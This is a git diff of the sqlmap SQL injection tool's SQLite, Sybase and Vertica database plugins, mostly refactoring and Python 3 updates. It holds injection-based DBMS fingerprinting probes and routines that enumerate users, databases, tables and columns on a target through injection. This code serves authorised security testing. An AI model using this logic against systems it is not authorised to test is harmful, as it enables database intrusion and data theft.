--git a/plugins/dbms/sqlite/enumeration.py b/plugins/dbms/sqlite/enumeration.py index a5509c5643c..18df65145e8 100644 --- a/plugins/dbms/sqlite/enumeration.py +++ b/plugins/dbms/sqlite/enumeration.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.data import logger @@ -10,48 +10,47 @@ from plugins.generic.enumeration import Enumeration as GenericEnumeration class Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) - def getCurrentUser(self): warnMsg = "on SQLite it is not possible to enumerate the current user" - logger.warn(warnMsg) + logger.warning(warnMsg) def getCurrentDb(self): warnMsg = "on SQLite it is not possible to get name of the current database" - logger.warn(warnMsg) + logger.warning(warnMsg) - def isDba(self): + def isDba(self, user=None): warnMsg = "on SQLite the current user has all privileges" - logger.warn(warnMsg) + logger.warning(warnMsg) + + return True def getUsers(self): warnMsg = "on SQLite it is not possible to enumerate the users" - logger.warn(warnMsg) + logger.warning(warnMsg) return [] def getPasswordHashes(self): warnMsg = "on SQLite it is not possible to enumerate the user password hashes" - logger.warn(warnMsg) + logger.warning(warnMsg) return {} - def getPrivileges(self, *args): + def getPrivileges(self, *args, **kwargs): warnMsg = "on SQLite it is not possible to enumerate the user privileges" - logger.warn(warnMsg) + logger.warning(warnMsg) return {} def getDbs(self): warnMsg = "on SQLite it is not possible to enumerate databases (use only '--tables')" - logger.warn(warnMsg) + logger.warning(warnMsg) return [] def searchDb(self): warnMsg = "on SQLite it is not possible to search databases" - logger.warn(warnMsg) + logger.warning(warnMsg) return [] @@ -61,4 +60,10 @@ def searchColumn(self): def getHostname(self): warnMsg = "on SQLite it is not possible to enumerate the hostname" - logger.warn(warnMsg) + logger.warning(warnMsg) + + def getStatements(self): + warnMsg = "on SQLite it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] diff --git a/plugins/dbms/sqlite/filesystem.py b/plugins/dbms/sqlite/filesystem.py index df7d7a9696f..ad1bc2622d4 100644 --- a/plugins/dbms/sqlite/filesystem.py +++ b/plugins/dbms/sqlite/filesystem.py @@ -1,21 +1,18 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.exception import SqlmapUnsupportedFeatureException from plugins.generic.filesystem import Filesystem as GenericFilesystem class Filesystem(GenericFilesystem): - def __init__(self): - GenericFilesystem.__init__(self) - - def readFile(self, rFile): + def readFile(self, remoteFile): errMsg = "on SQLite it is not possible to read files" raise SqlmapUnsupportedFeatureException(errMsg) - def writeFile(self, wFile, dFile, fileType=None): + def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): errMsg = "on SQLite it is not possible to write files" raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/sqlite/fingerprint.py b/plugins/dbms/sqlite/fingerprint.py index 6073ab31380..5a2d7f159c6 100644 --- a/plugins/dbms/sqlite/fingerprint.py +++ b/plugins/dbms/sqlite/fingerprint.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.common import Backend @@ -45,9 +45,11 @@ def getFingerprint(self): value += "active fingerprint: %s" % actVer if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] - banVer = Format.getDbms([banVer]) - value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) htmlErrorFp = Format.getErrorParsedDBMSes() @@ -64,7 +66,7 @@ def checkDbms(self): * http://www.sqlite.org/cvstrac/wiki?p=LoadableExtensions """ - if not conf.extensiveFp and (Backend.isDbmsWithin(SQLITE_ALIASES) or conf.dbms in SQLITE_ALIASES): + if not conf.extensiveFp and Backend.isDbmsWithin(SQLITE_ALIASES): setDbms(DBMS.SQLITE) self.getBanner() @@ -84,14 +86,14 @@ def checkDbms(self): if not result: warnMsg = "the back-end DBMS is not %s" % DBMS.SQLITE - logger.warn(warnMsg) + logger.warning(warnMsg) return False else: infoMsg = "actively fingerprinting %s" % DBMS.SQLITE logger.info(infoMsg) - result = inject.checkBooleanExpression("RANDOMBLOB(-1)>0") + result = inject.checkBooleanExpression("RANDOMBLOB(-1) IS NOT NULL") version = '3' if result else '2' Backend.setVersion(version) @@ -102,7 +104,7 @@ def checkDbms(self): return True else: warnMsg = "the back-end DBMS is not %s" % DBMS.SQLITE - logger.warn(warnMsg) + logger.warning(warnMsg) return False diff --git a/plugins/dbms/sqlite/syntax.py b/plugins/dbms/sqlite/syntax.py index 83c0a474151..62a9379fa50 100644 --- a/plugins/dbms/sqlite/syntax.py +++ b/plugins/dbms/sqlite/syntax.py @@ -1,27 +1,22 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import binascii - -from lib.core.common import isDBMSVersionAtLeast +from lib.core.convert import getOrds from plugins.generic.syntax import Syntax as GenericSyntax class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - @staticmethod def escape(expression, quote=True): - def escaper(value): - return "X'%s'" % binascii.hexlify(value) + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHAR(97,98,99,100,101,102,103,104) FROM foobar" + True + """ - retVal = expression - - if isDBMSVersionAtLeast('3'): - retVal = Syntax._escape(expression, quote, escaper) + def escaper(value): + return "CHAR(%s)" % ','.join("%d" % _ for _ in getOrds(value)) - return retVal + return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/sqlite/takeover.py b/plugins/dbms/sqlite/takeover.py index c619f23f37f..1ed29162e6f 100644 --- a/plugins/dbms/sqlite/takeover.py +++ b/plugins/dbms/sqlite/takeover.py @@ -1,17 +1,14 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.exception import SqlmapUnsupportedFeatureException from plugins.generic.takeover import Takeover as GenericTakeover class Takeover(GenericTakeover): - def __init__(self): - GenericTakeover.__init__(self) - def osCmd(self): errMsg = "on SQLite it is not possible to execute commands" raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/sybase/__init__.py b/plugins/dbms/sybase/__init__.py index 7c6eb775f77..02b471b1636 100644 --- a/plugins/dbms/sybase/__init__.py +++ b/plugins/dbms/sybase/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.enums import DBMS @@ -23,11 +23,7 @@ class SybaseMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Tak def __init__(self): self.excludeDbsList = SYBASE_SYSTEM_DBS - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) + for cls in self.__class__.__bases__: + cls.__init__(self) unescaper[DBMS.SYBASE] = Syntax.escape diff --git a/plugins/dbms/sybase/connector.py b/plugins/dbms/sybase/connector.py index c859f9632cf..aed2d79e393 100644 --- a/plugins/dbms/sybase/connector.py +++ b/plugins/dbms/sybase/connector.py @@ -1,19 +1,20 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ try: import _mssql import pymssql -except ImportError: +except: pass import logging -from lib.core.convert import utf8encode +from lib.core.common import getSafeExString +from lib.core.convert import getText from lib.core.data import conf from lib.core.data import logger from lib.core.exception import SqlmapConnectionException @@ -33,37 +34,36 @@ class Connector(GenericConnector): to work, get it from http://sourceforge.net/projects/pymssql/files/pymssql/1.0.2/ """ - def __init__(self): - GenericConnector.__init__(self) - def connect(self): self.initConnection() try: self.connector = pymssql.connect(host="%s:%d" % (self.hostname, self.port), user=self.user, password=self.password, database=self.db, login_timeout=conf.timeout, timeout=conf.timeout) - except pymssql.OperationalError, msg: - raise SqlmapConnectionException(msg) + except (pymssql.Error, _mssql.MssqlDatabaseException) as ex: + raise SqlmapConnectionException(ex) + except ValueError: + raise SqlmapConnectionException self.initCursor() - self.connected() + self.printConnected() def fetchall(self): try: return self.cursor.fetchall() - except (pymssql.ProgrammingError, pymssql.OperationalError, _mssql.MssqlDatabaseException), msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % str(msg).replace("\n", " ")) + except (pymssql.Error, _mssql.MssqlDatabaseException) as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) '%s'" % getSafeExString(ex).replace("\n", " ")) return None def execute(self, query): retVal = False try: - self.cursor.execute(utf8encode(query)) + self.cursor.execute(getText(query)) retVal = True - except (pymssql.OperationalError, pymssql.ProgrammingError), msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % str(msg).replace("\n", " ")) - except pymssql.InternalError, msg: - raise SqlmapConnectionException(msg) + except (pymssql.OperationalError, pymssql.ProgrammingError) as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) '%s'" % getSafeExString(ex).replace("\n", " ")) + except pymssql.InternalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) return retVal diff --git a/plugins/dbms/sybase/enumeration.py b/plugins/dbms/sybase/enumeration.py index d51f21ac8ec..afc4bba1a78 100644 --- a/plugins/dbms/sybase/enumeration.py +++ b/plugins/dbms/sybase/enumeration.py @@ -1,39 +1,44 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -from lib.core.common import Backend +import re + from lib.core.common import filterPairValues +from lib.core.common import isListLike from lib.core.common import isTechniqueAvailable -from lib.core.common import randomStr +from lib.core.common import readInput from lib.core.common import safeSQLIdentificatorNaming +from lib.core.common import unArrayizeValue from lib.core.common import unsafeSQLIdentificatorNaming from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.data import paths from lib.core.data import queries from lib.core.dicts import SYBASE_TYPES +from lib.core.enums import DBMS from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapNoneDataException +from lib.core.exception import SqlmapUserQuitException from lib.core.settings import CURRENT_DB +from lib.utils.brute import columnExists from lib.utils.pivotdumptable import pivotDumpTable from plugins.generic.enumeration import Enumeration as GenericEnumeration +from thirdparty import six +from thirdparty.six.moves import zip as _zip class Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) - def getUsers(self): infoMsg = "fetching database users" logger.info(infoMsg) - rootQuery = queries[Backend.getIdentifiedDbms()].users + rootQuery = queries[DBMS.SYBASE].users - randStr = randomStr() query = rootQuery.inband.query if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: @@ -42,19 +47,19 @@ def getUsers(self): blinds = (True,) for blind in blinds: - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr], blind=blind) + retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName], blind=blind, alias=kb.aliasName) if retVal: - kb.data.cachedUsers = retVal[0].values()[0] + kb.data.cachedUsers = list(retVal[0].values())[0] break return kb.data.cachedUsers - def getPrivileges(self, *args): + def getPrivileges(self, *args, **kwargs): warnMsg = "on Sybase it is not possible to fetch " warnMsg += "database users privileges, sqlmap will check whether " warnMsg += "or not the database users are database administrators" - logger.warn(warnMsg) + logger.warning(warnMsg) users = [] areAdmins = set() @@ -67,6 +72,8 @@ def getPrivileges(self, *args): users = kb.data.cachedUsers for user in users: + user = unArrayizeValue(user) + if user is None: continue @@ -86,8 +93,7 @@ def getDbs(self): infoMsg = "fetching database names" logger.info(infoMsg) - rootQuery = queries[Backend.getIdentifiedDbms()].dbs - randStr = randomStr() + rootQuery = queries[DBMS.SYBASE].dbs query = rootQuery.inband.query if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: @@ -96,10 +102,10 @@ def getDbs(self): blinds = [True] for blind in blinds: - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr], blind=blind) + retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName], blind=blind, alias=kb.aliasName) if retVal: - kb.data.cachedDbs = retVal[0].values()[0] + kb.data.cachedDbs = next(six.itervalues(retVal[0])) break if kb.data.cachedDbs: @@ -117,17 +123,17 @@ def getTables(self, bruteForce=None): conf.db = self.getCurrentDb() if conf.db: - dbs = conf.db.split(",") + dbs = conf.db.split(',') else: dbs = self.getDbs() for db in dbs: dbs[dbs.index(db)] = safeSQLIdentificatorNaming(db) - dbs = filter(None, dbs) + dbs = [_ for _ in dbs if _] infoMsg = "fetching tables for database" - infoMsg += "%s: %s" % ("s" if len(dbs) > 1 else "", ", ".join(db if isinstance(db, basestring) else db[0] for db in sorted(dbs))) + infoMsg += "%s: %s" % ("s" if len(dbs) > 1 else "", ", ".join(db if isinstance(db, six.string_types) else db[0] for db in sorted(dbs))) logger.info(infoMsg) if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: @@ -135,16 +141,15 @@ def getTables(self, bruteForce=None): else: blinds = [True] - rootQuery = queries[Backend.getIdentifiedDbms()].tables + rootQuery = queries[DBMS.SYBASE].tables for db in dbs: for blind in blinds: - randStr = randomStr() query = rootQuery.inband.query % db - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr], blind=blind) + retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName], blind=blind, alias=kb.aliasName) if retVal: - for table in retVal[0].values()[0]: + for table in next(six.itervalues(retVal[0])): if db not in kb.data.cachedTables: kb.data.cachedTables[db] = [table] else: @@ -156,7 +161,7 @@ def getTables(self, bruteForce=None): return kb.data.cachedTables - def getColumns(self, onlyColNames=False): + def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMode=False): self.forceDbmsEnum() if conf.db is None or conf.db == CURRENT_DB: @@ -164,12 +169,12 @@ def getColumns(self, onlyColNames=False): warnMsg = "missing database parameter. sqlmap is going " warnMsg += "to use the current database to enumerate " warnMsg += "table(s) columns" - logger.warn(warnMsg) + logger.warning(warnMsg) conf.db = self.getCurrentDb() elif conf.db is not None: - if ',' in conf.db: + if ',' in conf.db: errMsg = "only one database name is allowed when enumerating " errMsg += "the tables' columns" raise SqlmapMissingMandatoryOptionException(errMsg) @@ -177,22 +182,25 @@ def getColumns(self, onlyColNames=False): conf.db = safeSQLIdentificatorNaming(conf.db) if conf.col: - colList = conf.col.split(",") + colList = conf.col.split(',') else: colList = [] + if conf.exclude: + colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None] + for col in colList: colList[colList.index(col)] = safeSQLIdentificatorNaming(col) if conf.tbl: - tblList = conf.tbl.split(",") + tblList = conf.tbl.split(',') else: self.getTables() if len(kb.data.cachedTables) > 0: - tblList = kb.data.cachedTables.values() + tblList = list(six.itervalues(kb.data.cachedTables)) - if isinstance(tblList[0], (set, tuple, list)): + if tblList and isListLike(tblList[0]): tblList = tblList[0] else: errMsg = "unable to retrieve the tables " @@ -200,9 +208,46 @@ def getColumns(self, onlyColNames=False): raise SqlmapNoneDataException(errMsg) for tbl in tblList: - tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl) + tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True) + + if bruteForce: + resumeAvailable = False + + for tbl in tblList: + for db, table, colName, colType in kb.brute.columns: + if db == conf.db and table == tbl: + resumeAvailable = True + break + + if resumeAvailable and not conf.freshQueries or colList: + columns = {} + + for column in colList: + columns[column] = None + + for tbl in tblList: + for db, table, colName, colType in kb.brute.columns: + if db == conf.db and table == tbl: + columns[colName] = colType - rootQuery = queries[Backend.getIdentifiedDbms()].columns + if conf.db in kb.data.cachedColumns: + kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)] = columns + else: + kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = {safeSQLIdentificatorNaming(tbl, True): columns} + + return kb.data.cachedColumns + + message = "do you want to use common column existence check? [y/N/q] " + choice = readInput(message, default='Y' if 'Y' in message else 'N').upper() + + if choice == 'N': + return + elif choice == 'Q': + raise SqlmapUserQuitException + else: + return columnExists(paths.COMMON_COLUMNS) + + rootQuery = queries[DBMS.SYBASE].columns if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: blinds = [False, True] @@ -219,9 +264,9 @@ def getColumns(self, onlyColNames=False): return {conf.db: kb.data.cachedColumns[conf.db]} - if colList: + if dumpMode and colList: table = {} - table[safeSQLIdentificatorNaming(tbl)] = dict((_, None) for _ in colList) + table[safeSQLIdentificatorNaming(tbl, True)] = dict((_, None) for _ in colList) kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table continue @@ -231,18 +276,17 @@ def getColumns(self, onlyColNames=False): logger.info(infoMsg) for blind in blinds: - randStr = randomStr() query = rootQuery.inband.query % (conf.db, conf.db, conf.db, conf.db, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl)) - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr, '%s.usertype' % randStr], blind=blind) + retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName, '%s.usertype' % kb.aliasName], blind=blind, alias=kb.aliasName) if retVal: table = {} columns = {} - for name, type_ in filterPairValues(zip(retVal[0]["%s.name" % randStr], retVal[0]["%s.usertype" % randStr])): - columns[name] = SYBASE_TYPES.get(type_, type_) + for name, type_ in filterPairValues(_zip(retVal[0]["%s.name" % kb.aliasName], retVal[0]["%s.usertype" % kb.aliasName])): + columns[name] = SYBASE_TYPES.get(int(type_) if hasattr(type_, "isdigit") and type_.isdigit() else type_, type_) - table[safeSQLIdentificatorNaming(tbl)] = columns + table[safeSQLIdentificatorNaming(tbl, True)] = columns kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table break @@ -251,26 +295,32 @@ def getColumns(self, onlyColNames=False): def searchDb(self): warnMsg = "on Sybase searching of databases is not implemented" - logger.warn(warnMsg) + logger.warning(warnMsg) return [] def searchTable(self): warnMsg = "on Sybase searching of tables is not implemented" - logger.warn(warnMsg) + logger.warning(warnMsg) return [] def searchColumn(self): warnMsg = "on Sybase searching of columns is not implemented" - logger.warn(warnMsg) + logger.warning(warnMsg) return [] def search(self): warnMsg = "on Sybase search option is not available" - logger.warn(warnMsg) + logger.warning(warnMsg) def getHostname(self): warnMsg = "on Sybase it is not possible to enumerate the hostname" - logger.warn(warnMsg) + logger.warning(warnMsg) + + def getStatements(self): + warnMsg = "on Sybase it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] diff --git a/plugins/dbms/sybase/filesystem.py b/plugins/dbms/sybase/filesystem.py index f960c92c901..0a3e73bf7b4 100644 --- a/plugins/dbms/sybase/filesystem.py +++ b/plugins/dbms/sybase/filesystem.py @@ -1,21 +1,18 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.exception import SqlmapUnsupportedFeatureException from plugins.generic.filesystem import Filesystem as GenericFilesystem class Filesystem(GenericFilesystem): - def __init__(self): - GenericFilesystem.__init__(self) - - def readFile(self, rFile): + def readFile(self, remoteFile): errMsg = "on Sybase it is not possible to read files" raise SqlmapUnsupportedFeatureException(errMsg) - def writeFile(self, wFile, dFile, fileType=None): + def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): errMsg = "on Sybase it is not possible to write files" raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/sybase/fingerprint.py b/plugins/dbms/sybase/fingerprint.py index f63be2da2f8..64b66ba4268 100644 --- a/plugins/dbms/sybase/fingerprint.py +++ b/plugins/dbms/sybase/fingerprint.py @@ -1,12 +1,14 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.common import Backend from lib.core.common import Format +from lib.core.common import unArrayizeValue +from lib.core.compat import xrange from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger @@ -45,9 +47,11 @@ def getFingerprint(self): value += "active fingerprint: %s" % actVer if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] - banVer = Format.getDbms([banVer]) - value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) htmlErrorFp = Format.getErrorParsedDBMSes() @@ -57,9 +61,7 @@ def getFingerprint(self): return value def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(SYBASE_ALIASES) \ - or conf.dbms in SYBASE_ALIASES) and Backend.getVersion() and \ - Backend.getVersion().isdigit(): + if not conf.extensiveFp and Backend.isDbmsWithin(SYBASE_ALIASES): setDbms("%s %s" % (DBMS.SYBASE, Backend.getVersion())) self.getBanner() @@ -74,7 +76,7 @@ def checkDbms(self): if conf.direct: result = True else: - result = inject.checkBooleanExpression("tempdb_id()=tempdb_id()") + result = inject.checkBooleanExpression("@@transtate=@@transtate") if result: infoMsg = "confirming %s" % DBMS.SYBASE @@ -84,7 +86,7 @@ def checkDbms(self): if not result: warnMsg = "the back-end DBMS is not %s" % DBMS.SYBASE - logger.warn(warnMsg) + logger.warning(warnMsg) return False @@ -98,16 +100,21 @@ def checkDbms(self): infoMsg = "actively fingerprinting %s" % DBMS.SYBASE logger.info(infoMsg) - for version in xrange(12, 16): - result = inject.checkBooleanExpression("@@VERSION_NUMBER/1000=%d" % version) + result = unArrayizeValue(inject.getValue("SUBSTRING(@@VERSION,1,1)")) + + if result and result.isdigit(): + Backend.setVersion(str(result)) + else: + for version in xrange(12, 16): + result = inject.checkBooleanExpression("PATINDEX('%%/%d[./]%%',@@VERSION)>0" % version) - if result: - Backend.setVersion(str(version)) - break + if result: + Backend.setVersion(str(version)) + break return True else: warnMsg = "the back-end DBMS is not %s" % DBMS.SYBASE - logger.warn(warnMsg) + logger.warning(warnMsg) return False diff --git a/plugins/dbms/sybase/syntax.py b/plugins/dbms/sybase/syntax.py index add4012605c..53f0bea1bc1 100644 --- a/plugins/dbms/sybase/syntax.py +++ b/plugins/dbms/sybase/syntax.py @@ -1,19 +1,24 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from lib.core.convert import getOrds from plugins.generic.syntax import Syntax as GenericSyntax class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - @staticmethod def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHAR(97)+CHAR(98)+CHAR(99)+CHAR(100)+CHAR(101)+CHAR(102)+CHAR(103)+CHAR(104) FROM foobar" + True + >>> Syntax.escape(u"SELECT 'abcd\xebfgh' FROM foobar") == "SELECT CHAR(97)+CHAR(98)+CHAR(99)+CHAR(100)+TO_UNICHAR(235)+CHAR(102)+CHAR(103)+CHAR(104) FROM foobar" + True + """ + def escaper(value): - return "+".join("%s(%d)" % ("CHAR" if ord(value[i]) < 256 else "TO_UNICHAR", ord(value[i])) for i in xrange(len(value))) + return "+".join("%s(%d)" % ("CHAR" if _ < 128 else "TO_UNICHAR", _) for _ in getOrds(value)) return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/sybase/takeover.py b/plugins/dbms/sybase/takeover.py index 026bcf7f723..ccc94f21e20 100644 --- a/plugins/dbms/sybase/takeover.py +++ b/plugins/dbms/sybase/takeover.py @@ -1,17 +1,14 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.exception import SqlmapUnsupportedFeatureException from plugins.generic.takeover import Takeover as GenericTakeover class Takeover(GenericTakeover): - def __init__(self): - GenericTakeover.__init__(self) - def osCmd(self): errMsg = "on Sybase it is not possible to execute commands" raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/vertica/__init__.py b/plugins/dbms/vertica/__init__.py new file mode 100644 index 00000000000..2d0f69528e0 --- /dev/null +++ b/plugins/dbms/vertica/__init__.py @@ -0,0 +1,30 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import VERTICA_SYSTEM_DBS +from lib.core.unescaper import unescaper + +from plugins.dbms.vertica.enumeration import Enumeration +from plugins.dbms.vertica.filesystem import Filesystem +from plugins.dbms.vertica.fingerprint import Fingerprint +from plugins.dbms.vertica.syntax import Syntax +from plugins.dbms.vertica.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class VerticaMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines Vertica methods + """ + + def __init__(self): + self.excludeDbsList = VERTICA_SYSTEM_DBS + + for cls in self.__class__.__bases__: + cls.__init__(self) + + unescaper[DBMS.VERTICA] = Syntax.escape diff --git a/plugins/dbms/vertica/connector.py b/plugins/dbms/vertica/connector.py new file mode 100644 index 00000000000..bfce0ce645d --- /dev/null +++ b/plugins/dbms/vertica/connector.py @@ -0,0 +1,59 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +try: + import vertica_python +except: + pass + +import logging + +from lib.core.common import getSafeExString +from lib.core.data import conf +from lib.core.data import logger +from lib.core.exception import SqlmapConnectionException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + """ + Homepage: https://github.com/vertica/vertica-python + User guide: https://github.com/vertica/vertica-python/blob/master/README.md + API: https://www.python.org/dev/peps/pep-0249/ + License: Apache 2.0 + """ + + def connect(self): + self.initConnection() + + try: + self.connector = vertica_python.connect(host=self.hostname, user=self.user, password=self.password, database=self.db, port=self.port, connection_timeout=conf.timeout) + except vertica_python.OperationalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + self.initCursor() + self.printConnected() + + def fetchall(self): + try: + return self.cursor.fetchall() + except vertica_python.ProgrammingError as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + return None + + def execute(self, query): + try: + self.cursor.execute(query) + except (vertica_python.OperationalError, vertica_python.ProgrammingError) as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + except vertica_python.InternalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + self.connector.commit() + + def select(self, query): + self.execute(query) + return self.fetchall() diff --git a/plugins/dbms/vertica/enumeration.py b/plugins/dbms/vertica/enumeration.py new file mode 100644 index 00000000000..49ead488f66 --- /dev/null +++ b/plugins/dbms/vertica/enumeration.py @@ -0,0 +1,16 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import logger +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def getRoles(self, *args, **kwargs): + warnMsg = "on Vertica it is not possible to enumerate the user roles" + logger.warning(warnMsg) + + return {} diff --git a/plugins/dbms/vertica/filesystem.py b/plugins/dbms/vertica/filesystem.py new file mode 100644 index 00000000000..2e61d83c07c --- /dev/null +++ b/plugins/dbms/vertica/filesystem.py @@ -0,0 +1,11 @@ 